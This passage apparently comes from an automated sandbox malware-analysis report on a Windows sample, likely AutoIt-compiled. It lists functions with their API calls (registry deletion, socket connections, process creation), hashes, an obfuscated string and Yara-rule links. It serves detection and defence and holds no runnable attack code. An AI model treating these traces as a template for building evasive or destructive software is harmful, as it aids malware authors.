                    • String ID: ,,I$DllGetClassObject
                    • API String ID: 753597075-1683996018
                    • Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                    • Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
                    • Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                    • Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8
                    Function 00463671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                      • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                    • lstrcmpiW.KERNEL32(?,?), ref: 004636B7
                    • _wcscmp.LIBCMT ref: 004636D3
                    • MoveFileW.KERNEL32(?,?), ref: 004636EB
                    • _wcscat.LIBCMT ref: 00463733
                    • SHFileOperationW.SHELL32(?), ref: 0046379F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                    • String ID: \*.*
                    • API String ID: 1377345388-1173974218
                    • Opcode ID: 0993e5ca929c2efa997c1b424dbcfd90290d04f9ce8d0f9705211f6a3ce64837
                    • Instruction ID: 4e874dc4fae4897927e7b4621483e23afab501f30efb2571b7469179fc3cc0d5
                    • Opcode Fuzzy Hash: 0993e5ca929c2efa997c1b424dbcfd90290d04f9ce8d0f9705211f6a3ce64837
                    • Instruction Fuzzy Hash: 1A418FB1508344AEC752EF65D4419DFB7E8AF88345F40082FB48AC3261FA38D689C75B
                    Function 00487291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 004872AA
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                    • IsMenu.USER32(?), ref: 00487369
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                    • DrawMenuBar.USER32 ref: 004873C4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert_memset
                    • String ID: 0
                    • API String ID: 3866635326-4108050209
                    • Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                    • Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
                    • Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                    • Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65
                    Function 00480FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                    • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                      • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
                      • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                      • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    • Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                    • Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
                    • Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                    • Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9
                    Function 004862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                    • GetWindowLongW.USER32(00BA2928,000000F0), ref: 0048631F
                    • GetWindowLongW.USER32(00BA2928,000000F0), ref: 00486354
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    • Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                    • Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
                    • Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                    • Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59
                    Function 00476173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
                    • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                    • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                    • WSAGetLastError.WSOCK32 ref: 00476221
                    • closesocket.WSOCK32(00000000), ref: 0047624A
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                    • String ID:
                    • API String ID: 910771015-0
                    • Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                    • Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
                    • Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                    • Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
                    Function 0045F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                    • API String ID: 1038674560-2734436370
                    • Opcode ID: 842b6d77a2cf942784fc1cb80210373f95780450b82a097604e26ce594b18ecd
                    • Instruction ID: 032906fc094d91378a6d64986483b761754d261e1b02b5d61cc05f8db2f6dc85
                    • Opcode Fuzzy Hash: 842b6d77a2cf942784fc1cb80210373f95780450b82a097604e26ce594b18ecd
                    • Instruction Fuzzy Hash: E621487220412166D620AA35AC02FA773D8AF59305B90443BFC4286192EB9C9D4EC29F
                    Function 0048B14B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                    • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                    Strings
                    • 8dowpbdowpedowpcdowp8dowp1dowpedowpcdowp0dowp4dowp0dowp1dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowp0dowpfdowp5dowp7dowpcdowp0dowp, xrefs: 0048B19B, 0048B1E3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$Long$MetricsSystem
                    • String ID: 8dowpbdowpedowpcdowp8dowp1dowpedowpcdowp0dowp4dowp0dowp1dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowp0dowpfdowp5dowp7dowpcdowp0dowp
                    • API String ID: 2294984445-3542874343
                    • Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                    • Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
                    • Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                    • Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
                    Function 004875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                      • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                      • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                    • Instruction ID: 4837c572468b061b20148283283cd62aa6e96b5405c17b40ad05b898919227a4
                    • Opcode Fuzzy Hash: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                    • Instruction Fuzzy Hash: B711D3B1110119BFEF109F64CC85EEB7F5DEF083A8F114115BA04A21A0D776AC21DBA8
                    Function 0048B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 0048B644
                    • _memset.LIBCMT ref: 0048B653
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C6F20,004C6F64), ref: 0048B682
                    • CloseHandle.KERNEL32 ref: 0048B694
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID: oL$doL
                    • API String ID: 3277943733-3421622115
                    • Opcode ID: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                    • Instruction ID: 7a1fecbce043cfc874fe0d77b44da30ff063324afa3e4e90fef9887594455fd0
                    • Opcode Fuzzy Hash: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                    • Instruction Fuzzy Hash: 20F05EB26403107AE2502761BC06FBB3A9CEB08395F41843ABE08E5192D7799C00C7AC
                    Function 0042406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                    • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                    • EncodePointer.KERNEL32(00000000), ref: 00424097
                    • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    • API String ID: 3489934621-2819208100
                    • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                    • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                    • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                    • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
                    Function 004664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove$__itow__swprintf
                    • String ID:
                    • API String ID: 3253778849-0
                    • Opcode ID: fe9901ce26e32bb0692479bdaf42c2082f3b6d1cf990fa2abf2d8d60f8352c62
                    • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                    • Opcode Fuzzy Hash: fe9901ce26e32bb0692479bdaf42c2082f3b6d1cf990fa2abf2d8d60f8352c62
                    • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                    Function 004801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                    • String ID:
                    • API String ID: 4046560759-0
                    • Opcode ID: e9e1de2a8514b30809e41df016a55355054fd04305f650abcdd5c446b8550fd4
                    • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                    • Opcode Fuzzy Hash: e9e1de2a8514b30809e41df016a55355054fd04305f650abcdd5c446b8550fd4
                    • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
                    Function 00485799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetMenu.USER32(?), ref: 004857FB
                    • GetMenuItemCount.USER32(00000000), ref: 00485832
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0048585A
                    • GetMenuItemID.USER32(?,?), ref: 004858C9
                    • GetSubMenu.USER32(?,?), ref: 004858D7
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00485928
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    • API String ID: 650687236-0
                    • Opcode ID: 8abb9afe0d45070bc485c8e9a4be2836fff40e6f3ccda3f512a692e10a3d4860
                    • Instruction ID: f019c79df8c938943ad8434395c060b2cb7e18679ec399e957168710705cd923
                    • Opcode Fuzzy Hash: 8abb9afe0d45070bc485c8e9a4be2836fff40e6f3ccda3f512a692e10a3d4860
                    • Instruction Fuzzy Hash: 72514C75E00615AFCF11EF65C845AAEBBB4EF48314F10446AE801BB352DB78AE418B99
                    Function 0045EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 0045EF06
                    • VariantClear.OLEAUT32(00000013), ref: 0045EF78
                    • VariantClear.OLEAUT32(00000000), ref: 0045EFD3
                    • _memmove.LIBCMT ref: 0045EFFD
                    • VariantClear.OLEAUT32(?), ref: 0045F04A
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
